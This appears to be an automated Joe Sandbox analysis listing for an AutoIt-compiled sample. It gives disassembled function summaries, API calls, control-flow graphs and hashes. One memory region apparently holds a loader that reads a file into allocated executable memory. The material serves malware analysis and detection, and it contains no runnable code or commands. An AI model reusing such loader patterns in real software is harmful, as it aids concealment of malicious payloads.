                                                      • GetSysColorBrush.USER32(0000000F), ref: 005E3074
                                                      • RegisterClassExW.USER32(00000030), ref: 005E309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
                                                      • LoadIconW.USER32(000000A9), ref: 005E30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: d0d5e4c2ed42a7c9a50f83a896f90a754227c7cdf4f35a31bc94c71c429eedf1
                                                      • Instruction ID: 7159a87c3ca6ed29013dc3411f2b8708f5f5b8b5dc84bc4b357549f761c92765
                                                      • Opcode Fuzzy Hash: d0d5e4c2ed42a7c9a50f83a896f90a754227c7cdf4f35a31bc94c71c429eedf1
                                                      • Instruction Fuzzy Hash: 5C21C4B1911618AFDB00EFA4FC89B9DBFF6FB09700F00612AF912A62A0D7B555448F95

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 005E4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A52F8,?,005E37AE,?), ref: 005E4724
                                                        • Part of subcall function 0060050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,005E7165), ref: 0060052D
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005E71A8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0061E8C8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0061E909
                                                      • RegCloseKey.ADVAPI32(?), ref: 0061E947
                                                      • _wcscat.LIBCMT ref: 0061E9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 492b592de66dfd4befdf6edf9611ce03946746b34100a6fce1729f93db7d9585
                                                      • Instruction ID: 65b293137f562d9232012bc3271c7122ac6df35183a16e20b61a4b577c315ce5
                                                      • Opcode Fuzzy Hash: 492b592de66dfd4befdf6edf9611ce03946746b34100a6fce1729f93db7d9585
                                                      • Instruction Fuzzy Hash: D071A3715083029EC308EF65EC45AABBBEAFF89310F44192EF495871A1DB71EA44CF51

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 760 5e3633-5e3681 762 5e3683-5e3686 760->762 763 5e36e1-5e36e3 760->763 764 5e3688-5e368f 762->764 765 5e36e7 762->765 763->762 766 5e36e5 763->766 767 5e374b-5e3753 PostQuitMessage 764->767 768 5e3695-5e369a 764->768 770 5e36ed-5e36f0 765->770 771 61d0cc-61d0fa call 5f1070 call 5f1093 765->771 769 5e36ca-5e36d2 DefWindowProcW 766->769 775 5e3711-5e3713 767->775 773 61d154-61d168 call 642527 768->773 774 5e36a0-5e36a2 768->774 776 5e36d8-5e36de 769->776 777 5e3715-5e373c SetTimer RegisterWindowMessageW 770->777 778 5e36f2-5e36f3 770->778 806 61d0ff-61d106 771->806 773->775 799 61d16e 773->799 782 5e36a8-5e36ad 774->782 783 5e3755-5e375f call 5e44a0 774->783 775->776 777->775 784 5e373e-5e3749 CreatePopupMenu 777->784 779 5e36f9-5e370c KillTimer call 5e443a call 5e3114 778->779 780 61d06f-61d072 778->780 779->775 792 61d074-61d076 780->792 793 61d0a8-61d0c7 MoveWindow 780->793 788 61d139-61d140 782->788 789 5e36b3-5e36b8 782->789 800 5e3764 783->800 784->775 788->769 795 61d146-61d14f call 637c36 788->795 797 5e36be-5e36c4 789->797 798 61d124-61d134 call 642d36 789->798 801 61d097-61d0a3 SetFocus 792->801 802 61d078-61d07b 792->802 793->775 795->769 797->769 797->806 798->775 799->769 800->775 801->775 802->797 807 61d081-61d092 call 5f1070 802->807 806->769 810 61d10c-61d11f call 5e443a call 5e434a 806->810 807->775 810->769
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 005E36D2
                                                      • KillTimer.USER32(?,00000001), ref: 005E36FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005E371F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E372A
                                                      • CreatePopupMenu.USER32 ref: 005E373E
                                                      • PostQuitMessage.USER32(00000000), ref: 005E374D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated$%g
                                                      • API String ID: 129472671-2615855565
                                                      • Opcode ID: 3d79c6aee2426e6ebfa7e23acc76c68a1c933acb507d9547991ff3a4393a973a
                                                      • Instruction ID: 06d418116010040c422680c1adbe5a9f20eb96dfbedcf222a2686a29702b0f16
                                                      • Opcode Fuzzy Hash: 3d79c6aee2426e6ebfa7e23acc76c68a1c933acb507d9547991ff3a4393a973a
                                                      • Instruction Fuzzy Hash: FE4159B1200685FBDB1CAF75EC0DBB93F97FB45300F141524F583872A1DAA5AF409A65

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 005E3A50
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 005E3A5F
                                                      • LoadIconW.USER32(00000063), ref: 005E3A76
                                                      • LoadIconW.USER32(000000A4), ref: 005E3A88
                                                      • LoadIconW.USER32(000000A2), ref: 005E3A9A
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005E3AC0
                                                      • RegisterClassExW.USER32(?), ref: 005E3B16
                                                        • Part of subcall function 005E3041: GetSysColorBrush.USER32(0000000F), ref: 005E3074
                                                        • Part of subcall function 005E3041: RegisterClassExW.USER32(00000030), ref: 005E309E
                                                        • Part of subcall function 005E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
                                                        • Part of subcall function 005E3041: InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
                                                        • Part of subcall function 005E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
                                                        • Part of subcall function 005E3041: LoadIconW.USER32(000000A9), ref: 005E30F2
                                                        • Part of subcall function 005E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 992fa7dd4683743f0ba279d21a54e23206e76a415e76db3b3fbc68653bd1e8bf
                                                      • Instruction ID: 029b6334bb8beae629a52699905e189fe478522e6627ad68093ef20a8f533454
                                                      • Opcode Fuzzy Hash: 992fa7dd4683743f0ba279d21a54e23206e76a415e76db3b3fbc68653bd1e8bf
                                                      • Instruction Fuzzy Hash: 34213771D00308AFEB10EFA5FC09B9D7FB2FB09711F10112AF501A62A1D3B6A6409F84

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rj
                                                      • API String ID: 1825951767-951826378
                                                      • Opcode ID: 05f1cdef1f52cb6d1e7cac5caf1b5783a5ab4e29396153927b78c627a76e42d6
                                                      • Instruction ID: 2e1a25f6b1a1b539c6cbabb81d5e6ad22f9ed989d0c1f256b43e8c91eb8f7ea2
                                                      • Opcode Fuzzy Hash: 05f1cdef1f52cb6d1e7cac5caf1b5783a5ab4e29396153927b78c627a76e42d6
                                                      • Instruction Fuzzy Hash: 9CA15E7190425EAACF09EFA2DC59AFEBB79FF55300F440429F456A7191EF705A08CBA0

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00600193
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0060019B
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006001A6
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006001B1
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006001B9
                                                        • Part of subcall function 00600162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006001C1
                                                        • Part of subcall function 005F60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005EF930), ref: 005F6154
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005EF9CD
                                                      • OleInitialize.OLE32(00000000), ref: 005EFA4A
                                                      • CloseHandle.KERNEL32(00000000), ref: 006245C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID: <Wj$\Tj$`N$%g$Sj
                                                      • API String ID: 1986988660-2083110435
                                                      • Opcode ID: 7fa51126b422d910b392c08d64b69809acd2acad8d6643958217a897aa783fd6
                                                      • Instruction ID: 279e8016212c20be878acbdc7b9fe18ebebff5a1f53482d7dec8c0fb9bf61f51
                                                      • Opcode Fuzzy Hash: 7fa51126b422d910b392c08d64b69809acd2acad8d6643958217a897aa783fd6
                                                      • Instruction Fuzzy Hash: 3381BCB0905A41DF8784FF79A8446197FE7FB9F306750A12AD01BCB272EB7468848F61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 983 e9b9e0-e9ba8e call e99400 986 e9ba95-e9babb call e9c8f0 CreateFileW 983->986 989 e9babd 986->989 990 e9bac2-e9bad2 986->990 991 e9bc0d-e9bc11 989->991 995 e9bad9-e9baf3 VirtualAlloc 990->995 996 e9bad4 990->996 993 e9bc53-e9bc56 991->993 994 e9bc13-e9bc17 991->994 997 e9bc59-e9bc60 993->997 998 e9bc19-e9bc1c 994->998 999 e9bc23-e9bc27 994->999 1002 e9bafa-e9bb11 ReadFile 995->1002 1003 e9baf5 995->1003 996->991 1004 e9bc62-e9bc6d 997->1004 1005 e9bcb5-e9bcca 997->1005 998->999 1000 e9bc29-e9bc33 999->1000 1001 e9bc37-e9bc3b 999->1001 1000->1001 1008 e9bc4b 1001->1008 1009 e9bc3d-e9bc47 1001->1009 1010 e9bb18-e9bb58 VirtualAlloc 1002->1010 1011 e9bb13 1002->1011 1003->991 1012 e9bc6f 1004->1012 1013 e9bc71-e9bc7d 1004->1013 1006 e9bcda-e9bce2 1005->1006 1007 e9bccc-e9bcd7 VirtualFree 1005->1007 1007->1006 1008->993 1009->1008 1014 e9bb5a 1010->1014 1015 e9bb5f-e9bb7a call e9cb40 1010->1015 1011->991 1012->1005 1016 e9bc7f-e9bc8f 1013->1016 1017 e9bc91-e9bc9d 1013->1017 1014->991 1023 e9bb85-e9bb8f 1015->1023 1021 e9bcb3 1016->1021 1018 e9bcaa-e9bcb0 1017->1018 1019 e9bc9f-e9bca8 1017->1019 1018->1021 1019->1021 1021->997 1024 e9bb91-e9bbc0 call e9cb40 1023->1024 1025 e9bbc2-e9bbd6 call e9c950 1023->1025 1024->1023 1031 e9bbd8 1025->1031 1032 e9bbda-e9bbde 1025->1032 1031->991 1033 e9bbea-e9bbee 1032->1033 1034 e9bbe0-e9bbe4 CloseHandle 1032->1034 1035 e9bbfe-e9bc07 1033->1035 1036 e9bbf0-e9bbfb VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E9BAB1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E9BCD7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384407868.0000000000E99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E99000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e99000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction ID: 0e0cc6c78fec8b7e53ced109374ac1702f2c7cf809c11b988548a94ca7523b77
                                                      • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction Fuzzy Hash: 00A10474E00209EBDF14CFA4DA95BEEBBB5FF48304F209159E501BB280DB759A81CB94

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1114 5e39d5-5e3a45 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E3A03
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3A24
                                                      • ShowWindow.USER32(00000000,?,?), ref: 005E3A38
                                                      • ShowWindow.USER32(00000000,?,?), ref: 005E3A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: d6166882f294d6af8327ad71aa62c868466e3501d33968eae3955e0870a6b84a
                                                      • Instruction ID: 86436d60fcff803853bcadf9b2e500152112f167aad624fbebf09881df0cf779
                                                      • Opcode Fuzzy Hash: d6166882f294d6af8327ad71aa62c868466e3501d33968eae3955e0870a6b84a
                                                      • Instruction Fuzzy Hash: AAF03A70500290BEEB30AB237C08F2B3E7FD7C7F50B00212ABA01A2170C6612800DEB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1467 e9b7b0-e9b8e2 call e99400 call e9b6a0 CreateFileW 1474 e9b8e9-e9b8f9 1467->1474 1475 e9b8e4 1467->1475 1478 e9b8fb 1474->1478 1479 e9b900-e9b91a VirtualAlloc 1474->1479 1476 e9b999-e9b99e 1475->1476 1478->1476 1480 e9b91c 1479->1480 1481 e9b91e-e9b935 ReadFile 1479->1481 1480->1476 1482 e9b939-e9b973 call e9b6e0 call e9a6a0 1481->1482 1483 e9b937 1481->1483 1488 e9b98f-e9b997 ExitProcess 1482->1488 1489 e9b975-e9b98a call e9b730 1482->1489 1483->1476 1488->1476 1489->1488
                                                      APIs
                                                        • Part of subcall function 00E9B6A0: Sleep.KERNELBASE(000001F4), ref: 00E9B6B1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E9B8D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384407868.0000000000E99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E99000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e99000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: 2JI7LERO8RQ
                                                      • API String ID: 2694422964-2351137262
                                                      • Opcode ID: 6d31febf8d42b69b8a65124dd5f61ff3e58842d893a80771e9b8826d4bd6af1f
                                                      • Instruction ID: 9d1ad698e5c41a90aadbd3892b32936653bf192b08964136e63e3ecbe29adfa7
                                                      • Opcode Fuzzy Hash: 6d31febf8d42b69b8a65124dd5f61ff3e58842d893a80771e9b8826d4bd6af1f
                                                      • Instruction Fuzzy Hash: 9F51AE70D14208EBEF10DBA4D959BEEBB79AF48300F1051A9E608BB2C1D7791B45CBA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1491 5e407c-5e4092 1492 5e416f-5e4173 1491->1492 1493 5e4098-5e40ad call 5e7a16 1491->1493 1496 61d3c8-61d3d7 LoadStringW 1493->1496 1497 5e40b3-5e40d3 call 5e7bcc 1493->1497 1500 61d3e2-61d3fa call 5e7b2e call 5e6fe3 1496->1500 1497->1500 1501 5e40d9-5e40dd 1497->1501 1511 5e40ed-5e416a call 602de0 call 5e454e call 602dbc Shell_NotifyIconW call 5e5904 1500->1511 1513 61d400-61d41e call 5e7cab call 5e6fe3 call 5e7cab 1500->1513 1503 5e4174-5e417d call 5e8047 1501->1503 1504 5e40e3-5e40e8 call 5e7b2e 1501->1504 1503->1511 1504->1511 1511->1492 1513->1511
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0061D3D7
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • _memset.LIBCMT ref: 005E40FC
                                                      • _wcscpy.LIBCMT ref: 005E4150
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005E4160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: 893bb43097fe6bc164fcd0773caac63b38991960291fe0388bde1c75444bb63b
                                                      • Instruction ID: cb3707a3d4e6f877b2e2637f3142266504ec74cd72b2614bf7f596ad84a306c2
                                                      • Opcode Fuzzy Hash: 893bb43097fe6bc164fcd0773caac63b38991960291fe0388bde1c75444bb63b
                                                      • Instruction Fuzzy Hash: 0231B071008786AED729EB61DC49BDB7BDDBF95310F10491AF5C692091EB70AA48CB82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                      • Instruction ID: 5014e501365226988853dce76d0aaa20beb7a77d3e4d93f8aa1afe49a648f34c
                                                      • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                      • Instruction Fuzzy Hash: 8251AF70A80B059BDB2D9EA9DC806EF77A7AF40321F248729F826962D1D7709D918F40
                                                      APIs
                                                        • Part of subcall function 005E4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E0F
                                                      • _free.LIBCMT ref: 0061E263
                                                      • _free.LIBCMT ref: 0061E2AA
                                                        • Part of subcall function 005E6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005E6BAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: 50411ad9504da09898d36cb8567288a89f99fee29af947f5bd6009409c18e54a
                                                      • Instruction ID: 2c1ce855b00960a05cf30114b964cadc308d8c25378c2c8c018580f425500d00
                                                      • Opcode Fuzzy Hash: 50411ad9504da09898d36cb8567288a89f99fee29af947f5bd6009409c18e54a
                                                      • Instruction Fuzzy Hash: 1B919F7190025AAFCF08DFA4CC559EDBBBAFF18310F144429F815AB2A1DB71AE55CB50
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005E35A1,SwapMouseButtons,00000004,?), ref: 005E35D4
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005E35A1,SwapMouseButtons,00000004,?,?,?,?,005E2754), ref: 005E35F5
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,005E35A1,SwapMouseButtons,00000004,?,?,?,?,005E2754), ref: 005E3617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 0628498d27eec9c256ba2700b1771e33c6aa125f58db0b061dac989cf53e0ff0
